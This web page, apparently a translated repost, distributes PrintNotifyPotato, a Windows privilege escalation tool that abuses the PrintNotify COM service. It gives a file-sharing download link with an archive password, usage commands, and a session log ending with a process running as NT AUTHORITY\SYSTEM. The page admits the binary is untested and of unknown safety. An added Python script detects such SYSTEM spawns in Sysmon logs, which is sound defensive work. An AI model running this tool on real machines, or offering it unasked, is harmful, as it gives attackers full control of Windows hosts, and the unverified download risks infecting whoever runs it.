PrintNotifyPotato: Windows privilege escalation tool

About PrintNotifyPotato

Another potato: it uses the PrintNotify COM service to escalate privileges.

Applies to
Windows 10 – 11
Windows Server 2012 – 2022

PrintNotifyPotato download

Yunzhongzhuan (cloud transfer) download link:
yunzhongzhuan.com/#sharefile=vjJOpwil_112919
Archive password: www.ddosi.org

Usage:


C:\Windows\Temp >PrintNotifyPotato.exe 

aaaa    aaa                           aaa         
 aaaa    aaa                           aaa         
 aaaa    aaa                           aaa         
 aaaa    aaa                           aaa         
 aaaa    aaa                           aaa         
 aaaa    aaa                           aaa         
 aaaa    aaa    aaaaaaa     aaaaaaa    aaa   aaaa  
 aaaaaaaaaaa   aaaaaaaaa   aaaaaaaaa   aaa  aaaa   
 aaaaaaaaaaa  aaaa   aaa  aaaa   aaaa  aaa aaaa    
 aaaa    aaa         aaa  aaaa   aaaa  aaaaaaa     
 aaaa    aaa     aaaaaaa  aaa          aaaaaaa     
 aaaa    aaa   aaaaaaaaa  aaa          aaaaaaaa    
 aaaa    aaa  aaaa   aaa  aaa     aaa  aaaa aaa    
 aaaa    aaa  aaa   aaaa  aaaa   aaaa  aaa  aaaa   
 aaaa    aaa  aaa  aaaaa   aaaa  aaaa  aaa   aaaa  
 aaaa    aaa  aaaaaaaaaa    aaaaaaaa   aaa    aaa  
 aaaa    aaa    aaaa aaaa    aaaaa     aaa    aaaa 

Github: https://github.com/BeichenDream/PrintNotifyPotato

Example:
            PrintNotifyPotato.exe whoami
            PrintNotifyPotato.exe cmd interactive
C:\Windows\Temp >PrintNotifyPotato.exe  whoami

[*] Create PrintNotify Success!
[*] Create FakeIUnknown Success!
[*] CreatePointerMoniker Success!
[*] Trigger......
[*] Got Token: 0x3d4
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] DuplicateTokenEx Success! PrimaryToken: 0x1016
[*] process start with pid 7272
nt authority\system
C:\Windows\Temp >
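
A defender-side check for the outcome shown in the session above, as an added example that is not part of the original post or the tool: it scans process-creation records for a process running as NT AUTHORITY\SYSTEM whose parent ran under a different account. It assumes Sysmon Event ID 1 records exported as JSON lines with the ParentUser field, and that the spawned process is logged with the launching tool as its parent; the sample events and account names are constructed.

```python
import json

SYSTEM = "nt authority\\system"
TEMP_DIRS = ("c:\\windows\\temp\\",)  # directory used in the page's session

# Constructed sample events (not from the page): Sysmon Event ID 1 (ProcessCreate)
# records reduced to the fields used here, plus one non-matching ID and one bad line.
SAMPLE_EVENTS = r"""
{"EventID": 1, "ProcessId": 7272, "Image": "C:\\Windows\\System32\\whoami.exe", "User": "NT AUTHORITY\\SYSTEM", "ParentImage": "C:\\Windows\\Temp\\PrintNotifyPotato.exe", "ParentUser": "IIS APPPOOL\\DefaultAppPool"}
{"EventID": 1, "ProcessId": 912, "Image": "C:\\Windows\\System32\\svchost.exe", "User": "NT AUTHORITY\\SYSTEM", "ParentImage": "C:\\Windows\\System32\\services.exe", "ParentUser": "NT AUTHORITY\\SYSTEM"}
{"EventID": 1, "ProcessId": 4100, "Image": "C:\\Windows\\System32\\cmd.exe", "User": "CORP\\alice", "ParentImage": "C:\\Windows\\explorer.exe", "ParentUser": "CORP\\alice"}
{"EventID": 3, "ProcessId": 912, "Image": "C:\\Windows\\System32\\svchost.exe", "User": "NT AUTHORITY\\SYSTEM"}
{"EventID": 1, "Image": "truncated
"""

def parse_events(text):
    """Yield dict events from JSON lines, skipping blank or malformed lines."""
    for line in filter(None, map(str.strip, text.splitlines())):
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # malformed line: skip it and keep processing
        if isinstance(event, dict):
            yield event

def find_system_spawns(events):
    """Return ProcessCreate events where a SYSTEM child has a non-SYSTEM parent."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 1:
            continue
        user = str(ev.get("User", "")).lower()
        parent_user = str(ev.get("ParentUser", "")).lower()
        # An unknown parent user (field missing or "-") is not treated as a hit.
        if user != SYSTEM or parent_user in ("", "-", SYSTEM):
            continue
        parent_image = str(ev.get("ParentImage", "")).lower()
        hits.append({
            "pid": ev.get("ProcessId"),
            "image": ev.get("Image"),
            "parent_image": ev.get("ParentImage"),
            "parent_user": ev.get("ParentUser"),
            "parent_in_temp": parent_image.startswith(TEMP_DIRS),
        })
    return hits

if __name__ == "__main__":
    for hit in find_system_spawns(parse_events(SAMPLE_EVENTS)):
        print(hit)
```
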

Project URL:

github.com/BeichenDream/PrintNotifyPotato

References

code.google.com/p/google-security-research/issues/detail?id=128

zcgonvh

github.com/antonioCoco/JuicyPotatoNG

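Notes

The tool has not been tested and its safety is unknown; use your own judgment or run it only inside a virtual machine.
This article is only a personal study record. The techniques involved are for learning and reference only and must not be used for anything else! Do not use the techniques mentioned in this article to illegally attack any computer system without authorization. Any direct or indirect consequences and losses caused by using the techniques provided here are the sole responsibility of the user.

Please credit the source and include a link when reposting.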
